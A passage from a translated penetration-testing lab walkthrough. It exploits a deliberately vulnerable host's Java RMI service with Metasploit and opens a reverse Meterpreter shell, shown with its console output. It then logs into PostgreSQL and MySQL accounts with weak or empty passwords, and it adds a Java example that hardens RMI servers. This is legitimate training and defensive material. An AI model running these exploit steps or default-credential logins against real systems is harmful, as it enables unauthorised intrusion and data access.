Penetration Testing Target Practice --- Systems Part 03

(Continued from) Penetration Testing Target Practice --- 02

7. Java RMI Server Insecure Default Configuration Remote Code Execution Vulnerability

msf5 exploit(linux/misc/drb_remote_codeexec) > search java_RMI 

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  auxiliary/gather/java_rmi_registry                               normal     No     Java RMI Registry Interfaces Enumeration
   1  auxiliary/scanner/misc/java_rmi_server          2011-10-15       normal     Yes    Java RMI Server Insecure Endpoint Code Execution Scanner
   2  exploit/multi/browser/java_rmi_connection_impl  2010-03-31       excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalation
   3  exploit/multi/misc/java_rmi_server              2011-10-15       excellent  No     Java RMI Server Insecure Default Configuration Java Code Execution


msf5 exploit(linux/misc/drb_remote_codeexec) > use exploit/multi/misc/java_rmi_server
msf5 exploit(multi/misc/java_rmi_server) > show info

       Name: Java RMI Server Insecure Default Configuration Java Code Execution
     Module: exploit/multi/misc/java_rmi_server
   Platform: Java, Linux, OSX, Solaris, Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-10-15

Provided by:
  mihi

Available targets:
  Id  Name
  --  ----
  0   Generic (Java Payload)
  1   Windows x86 (Native Payload)
  2   Linux x86 (Native Payload)
  3   Mac OS X PPC (Native Payload)
  4   Mac OS X x86 (Native Payload)

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      1099             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL for incoming connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                     no        The URI to use for this exploit (default is random)

Payload information:
  Avoid: 0 characters

Description:
  This module takes advantage of the default configuration of the RMI 
  Registry and RMI Activation services, which allow loading classes 
  from any remote (HTTP) URL. As it invokes a method in the RMI 
  Distributed Garbage Collector which is available via every RMI 
  endpoint, it can be used against both rmiregistry and rmid, and 
  against most other (custom) RMI endpoints as well. Note that it does 
  not work against Java Management Extension (JMX) ports since those 
  do not support remote class loading, unless another RMI endpoint is 
  active in the same Java process. RMI method calls do not support or 
  require any sort of authentication.

References:
  http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html
  http://www.securitytracker.com/id?1026215
  https://cvedetails.com/cve/CVE-2011-3556/

msf5 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.10.149
RHOSTS => 192.168.10.149
msf5 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.11.135:4444 
[*] 192.168.10.149:1099 - Using URL: http://0.0.0.0:8080/7LJx65WYnvMx
[*] 192.168.10.149:1099 - Local IP: http://192.168.11.135:8080/7LJx65WYnvMx
[*] 192.168.10.149:1099 - Server started.
[*] 192.168.10.149:1099 - Sending RMI Header...
[*] 192.168.10.149:1099 - Sending RMI Call...
[*] 192.168.10.149:1099 - Replied to request for payload JAR
[*] Sending stage (53845 bytes) to 192.168.10.149
[*] Meterpreter session 3 opened (192.168.11.135:4444 -> 192.168.10.149:33325) at 2019-10-12 17:29:09 +0800
[*] 192.168.10.149:1099 - Server stopped.

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > cd /
meterpreter > ls
Listing: /
==========

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100667/rw-rw-rwx  138      fil   2019-10-12 16:10:34 +0800  .aMndSYRKN0SFWvXN
40666/rw-rw-rw-   4096     dir   2012-05-14 11:35:33 +0800  bin
40666/rw-rw-rw-   1024     dir   2012-05-14 11:36:28 +0800  boot
40666/rw-rw-rw-   4096     dir   2010-03-17 06:55:51 +0800  cdrom
40666/rw-rw-rw-   13440    dir   2019-10-12 09:20:55 +0800  dev
40666/rw-rw-rw-   4096     dir   2019-10-12 16:04:38 +0800  etc
40666/rw-rw-rw-   4096     dir   2010-04-16 14:16:02 +0800  home
40666/rw-rw-rw-   4096     dir   2010-03-17 06:57:40 +0800  initrd
100666/rw-rw-rw-  7929183  fil   2012-05-14 11:35:56 +0800  initrd.img
40666/rw-rw-rw-   4096     dir   2012-05-14 11:35:22 +0800  lib
40666/rw-rw-rw-   16384    dir   2010-03-17 06:55:15 +0800  lost+found
40666/rw-rw-rw-   4096     dir   2010-03-17 06:55:52 +0800  media
40666/rw-rw-rw-   4096     dir   2010-04-29 04:16:56 +0800  mnt
100666/rw-rw-rw-  14672    fil   2019-10-12 16:10:35 +0800  nohup.out
40666/rw-rw-rw-   4096     dir   2010-03-17 06:57:39 +0800  opt
40666/rw-rw-rw-   0        dir   2019-10-12 09:20:18 +0800  proc
40666/rw-rw-rw-   4096     dir   2019-10-12 09:21:07 +0800  root
40666/rw-rw-rw-   4096     dir   2012-05-14 09:54:53 +0800  sbin
40666/rw-rw-rw-   4096     dir   2010-03-17 06:57:38 +0800  srv
40666/rw-rw-rw-   0        dir   2019-10-12 09:20:19 +0800  sys
40666/rw-rw-rw-   4096     dir   2019-10-12 16:25:12 +0800  tmp
40666/rw-rw-rw-   4096     dir   2010-04-28 12:06:37 +0800  usr
40666/rw-rw-rw-   4096     dir   2010-03-17 22:08:23 +0800  var
100666/rw-rw-rw-  1987288  fil   2008-04-11 00:55:41 +0800  vmlinuz

meterpreter > 

Using Metasploit we get straight into the system, as shown above.
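
As an added example (not part of the original walkthrough or of the Metasploit module), here is the server-side configuration that closes the two gaps the module description relies on: a minimal RMI service whose JVM ignores client-supplied codebase URLs and allow-lists what may be deserialized. The `Echo` interface and the `echo` binding name are made up for illustration; the system properties and the `ObjectInputFilter` API are the JDK's own (JDK 9 or later).

```java
import java.io.ObjectInputFilter;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

// Minimal RMI service hardened against the behaviour exploit/multi/misc/java_rmi_server
// depends on: fetching classes from a remote HTTP codebase and deserializing arbitrary types.
public class HardenedRmiServer {

    // Hypothetical remote interface used only for this example.
    public interface Echo extends Remote {
        String echo(String s) throws RemoteException;
    }

    static class EchoImpl extends UnicastRemoteObject implements Echo {
        EchoImpl() throws RemoteException { super(); }
        @Override public String echo(String s) { return s; }
    }

    public static void main(String[] args) throws Exception {
        // Ignore codebase annotations sent by clients; classes resolve only from the local
        // classpath. This has been the default since JDK 7u21, but set it explicitly so a
        // misconfigured launcher flag or an old runtime cannot silently re-enable it.
        System.setProperty("java.rmi.server.useCodebaseOnly", "true");

        // Filters for the registry and DGC endpoints (JDK 8u121+). Only java.base and
        // java.rmi classes may be deserialized there; everything else is rejected before
        // any constructor or readObject runs. These properties are read once when RMI
        // initializes, so they must be set before the first RMI call (or passed as -D flags).
        System.setProperty("sun.rmi.registry.registryFilter", "java.base/*;java.rmi/*;!*");
        System.setProperty("sun.rmi.transport.dgcFilter", "java.base/*;java.rmi/*;!*");

        // Process-wide allow-list (JEP 290) covering the arguments of our own remote methods.
        ObjectInputFilter.Config.setSerialFilter(
            ObjectInputFilter.Config.createFilter("java.base/*;java.rmi/*;!*"));

        Registry registry = LocateRegistry.createRegistry(1099);
        registry.rebind("echo", new EchoImpl());
        System.out.println("RMI registry on 1099: remote class loading disabled, deserialization filtered");
    }
}
```

Pair this with network-level restriction of port 1099 (the target in this walkthrough exposed it to the whole LAN) and, where a JMX agent shares the process, the same filters apply to it.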
8. PostgreSQL weak password

[Image 1: OpenVAS result for the PostgreSQL weak password finding]

OpenVAS has already scanned out the username/password. Logging in with mputty as shown below gives normal access to the system.

[Image 2: mputty login session]

9. MySQL / MariaDB weak password

[Image 3: OpenVAS result for the MySQL / MariaDB weak password finding]

The way to connect to the system is as follows:

root@kali:~#  mysql -u root -p -h 192.168.10.149 -P 3306
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 543
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases
    -> ;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.05 sec)

MySQL [(none)]>

At the password prompt above, simply press Enter (the root account has an empty password); the `show databases` command then lists every database on the server.

(To be continued) Penetration Testing Target Practice --- 04
